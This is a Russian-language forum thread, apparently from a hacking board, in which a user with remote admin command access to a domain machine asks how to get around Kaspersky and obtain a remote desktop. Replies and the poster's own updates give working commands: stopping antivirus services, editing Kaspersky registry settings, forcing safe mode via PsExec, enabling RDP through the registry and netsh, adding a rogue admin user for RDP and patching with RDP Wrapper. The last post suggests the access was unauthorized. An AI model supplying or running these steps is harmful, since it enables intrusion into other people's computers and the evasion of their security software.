Знатокам и администраторам Windows вопрос В локальной сети есть машина, с доступом к cmd с правами локального админа. Но хочется получить рабочий стол (VNC или RDP). На машине запущен kaspersky internet security. Который фильтрует почти всё. Spoiler: nmap Host is up (0.041s latency). Not shown: 992 closed ports PORT STATE SERVICE 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 1110/tcp filtered nfsd-status 1947/tcp open sentinelsrm 2869/tcp filtered icslap 3389/tcp filtered ms-wbt-server 19780/tcp filtered unknown Вопрос собственно такой: как через pstools и командную строку отключить kaspersky или открыть порты для подключения? tskill ksde /a /v - работает, но тут же запускается новый процесс. tskill avp /a /v - не работает, ошибка доступа taskkill - ошибка доступа, whoami при этом NT AUTHORITY\система Подскажите варианты, а то в этом windows все так не однозначно...
Тебе ничем не поможет то что ты прихлопываешь юзермодную часть. Авер прописывается в ядре и он знает об этих фокусах. Представь что было-бы если-бы какой-нибудь вирус взял и через cmd закрыл Касперского. Да это даже не смешно
Попробуй остановить службы касперского через командную строку. У меня так он убивается: net stop AVP net stop klnagent
Не даёт. Ещё не понятно то-ли pstools кривой, то-ли windows пиратский так работает, не все команды обрабатывает корректно, запускать cmd в интерактивную режиме совсем отказывается. https://pastebin.com/TfGA5TZY Щас попробую совсем удалить касперского.
с каких пор все на касперского перешли? он же не антивирус даже, насколько помню по временам криптования разных зверей
А я на нем дооолго сидел. В принципе он неплохо отрабатывал детект связок а от него в принципе это и требуется. Екзешник можно проверить и на вирустотале, перед тем как опрометчиво его запустить, а вот ежели кто пробьет Мозилу - будет совсем другая песня, довольно грустная. Вопроц сей религиозен
В моей конторе он корпративный на отдельном серваке и с юзверьским клиенскми ПО. Хорошо убивается отключением его служб.
Не получается, ошибка доступа. Теоретически один вариант остается: .\PsExec64.exe \\10.0.40.229 -s 'c:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 19.0.0\avp.com' stop firewall Но нужно установить пароль на касперского, так: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\AVP19.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\AVP19.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\KSDE1.0.0\settings" /v "EnablePswrdProtect" /d "00000001" /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\KSDE1.0.0\settings\def" /v "EnablePswrdProtect" /d "00000001" /f Но опять же... Ошибка доступа. Надо делать в безопасном режиме! Отправляю машину в безопасный режим: .\PsExec64.exe \\10.0.40.229 -s bcdedit /set safeboot network .\PsExec64.exe \\10.0.40.229 -s shutdown /r Вернулась, пингуется, но нет связи через PSTOOLS. Выходит, что касперский не такое уж и плохое решение. Но ресурсозатротность у него выше чем у тоже NOD. Было решить попробовать другой хост, там нет антивируса но порты все равно закрыты. Обе машины при этом в домене почему на них не распространяются политики домена по удаленному доступу - непонятно: https://pastebin.com/v3atAFHp И все равно вижу такое: Spoiler: nmap PS C:\Users\kpv\Downloads\nmap> .\nmap.exe --open -Pn 10.0.40.213 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 22:17 RTZ 4 (ceia) Nmap scan report for 10.0.40.213 Host is up (0.00062s latency). Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 40:16:7E:0E:75A (Asustek Computer) Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds PS C:\Users\kpv\Downloads\nmap> UPDATE Без антивируса RDP включается так: psexec.exe \\<computer name> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f psexec.exe \\<computer name> netsh firewall set service RemoteDesktop enable Причем даже перезагружать ничего не надо. Срабатывает сиюсекундно. Завтра буду мучить защищенную машину, надо дождаться реакции пользователя на безопасный режим.
А что мешает подключиться по RDP и вырубить каспера, либо же добавить в исключения нужный софт? Создай нового пользователя: Code: net user New_user PassW0rd /add net localgroup Администраторы New_user /add net localgroup "Пользователи удаленного рабочего стола" New_user /add Так как это не серверная, пропатчи с помощью RDP Wrapper Library: Code: Rdpwinst -i -o Раз уж это десятка, то может не патчиться(они постоянно обновления выпускают тогда ищи нужную версию rdpwrap.ini тут или в гоше, по запросу "rdpwrap.ini [номер винды] github.com". И после установки обнови: Code: Rdpwinst -w
Обязательно по локалке подключаться. TeamViewer возможно не заблокирует, т.к. там другой способ подключения. Или через планировщик возможно autoit скрипт запустить, он уже сделает остальное.
Так как сеть доменная. Сперва запускаю RDP служ. на локальной машине. Касперски тут бессилен. Повезло, что права админские, сделал своё дело и ушел.
